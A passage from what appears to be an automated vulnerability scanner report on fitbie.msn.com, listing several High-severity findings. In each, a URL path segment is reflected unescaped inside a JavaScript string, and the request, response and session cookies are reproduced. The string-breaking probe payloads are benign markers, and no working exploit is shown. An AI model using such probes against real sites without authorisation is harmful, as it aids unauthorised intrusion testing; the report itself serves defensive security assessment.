Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:45 +0000
ETag: "1297607865-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:37:45 GMT
Date: Sun, 13 Feb 2011 14:37:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/tips9e60e';b39761af491?destination=node%2Ftips9e60e';b39761af491&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.122. http://fitbie.msn.com/workout/15-minute-workout-strengthen-your-body-and-mind [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/15-minute-workout-strengthen-your-body-and-mind

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d82a7'%3bc0805125aa8 was submitted in the REST URL parameter 2. This input was echoed as d82a7';c0805125aa8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/15-minute-workout-strengthen-your-body-and-mindd82a7'%3bc0805125aa8 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:01 +0000
ETag: "1297607761-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:01 GMT
Date: Sun, 13 Feb 2011 14:36:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/15-minute-workout-strengthen-your-body-and-mindd82a7';c0805125aa8?destination=node%2F15-minute-workout-strengthen-your-body-and-mindd82a7';c0805125aa8&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.123. http://fitbie.msn.com/workout/3-moves-rev-your-metabolism [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/3-moves-rev-your-metabolism

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30265'%3b2ece6d7e2f6 was submitted in the REST URL parameter 2. This input was echoed as 30265';2ece6d7e2f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/3-moves-rev-your-metabolism30265'%3b2ece6d7e2f6 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:58 +0000
ETag: "1297607758-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:58 GMT
Date: Sun, 13 Feb 2011 14:35:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/3-moves-rev-your-metabolism30265';2ece6d7e2f6?destination=node%2F3-moves-rev-your-metabolism30265';2ece6d7e2f6&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.124. http://fitbie.msn.com/workout/bob-harpers-fat-blasting-workout [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/bob-harpers-fat-blasting-workout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9793c'%3b6f4e047b771 was submitted in the REST URL parameter 2. This input was echoed as 9793c';6f4e047b771 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/bob-harpers-fat-blasting-workout9793c'%3b6f4e047b771 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:02 +0000
ETag: "1297607762-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:02 GMT
Date: Sun, 13 Feb 2011 14:36:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/bob-harpers-fat-blasting-workout9793c';6f4e047b771?destination=node%2Fbob-harpers-fat-blasting-workout9793c';6f4e047b771&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.125. http://fitbie.msn.com/workout/lose-last-10-pounds [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/lose-last-10-pounds

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2747e'%3ba47c1c34509 was submitted in the REST URL parameter 2. This input was echoed as 2747e';a47c1c34509 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/lose-last-10-pounds2747e'%3ba47c1c34509 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:58 +0000
ETag: "1297607758-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3599
Expires: Sun, 13 Feb 2011 15:35:58 GMT
Date: Sun, 13 Feb 2011 14:35:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/lose-last-10-pounds2747e';a47c1c34509?destination=node%2Flose-last-10-pounds2747e';a47c1c34509&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.126. http://fitbie.msn.com/workout/mens-health-muscle-system [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/mens-health-muscle-system

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc994'%3b6c72705acc1 was submitted in the REST URL parameter 2. This input was echoed as bc994';6c72705acc1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/mens-health-muscle-systembc994'%3b6c72705acc1 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:02 +0000
ETag: "1297607762-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:03 GMT
Date: Sun, 13 Feb 2011 14:36:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/mens-health-muscle-systembc994';6c72705acc1?destination=node%2Fmens-health-muscle-systembc994';6c72705acc1&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.127. http://fitbie.msn.com/workout/muscle-memory-workout [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/muscle-memory-workout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dbdc'%3b02483d4f73f was submitted in the REST URL parameter 2. This input was echoed as 5dbdc';02483d4f73f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/muscle-memory-workout5dbdc'%3b02483d4f73f HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:06 +0000
ETag: "1297607766-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:06 GMT
Date: Sun, 13 Feb 2011 14:36:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/muscle-memory-workout5dbdc';02483d4f73f?destination=node%2Fmuscle-memory-workout5dbdc';02483d4f73f&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.128. http://fitbie.msn.com/workout/small-changes-big-results [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/workout/small-changes-big-results

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c49d2'%3b21edd9f2902 was submitted in the REST URL parameter 2. This input was echoed as c49d2';21edd9f2902 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /workout/small-changes-big-resultsc49d2'%3b21edd9f2902 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:35:59 +0000
ETag: "1297607759-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:35:59 GMT
Date: Sun, 13 Feb 2011 14:35:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
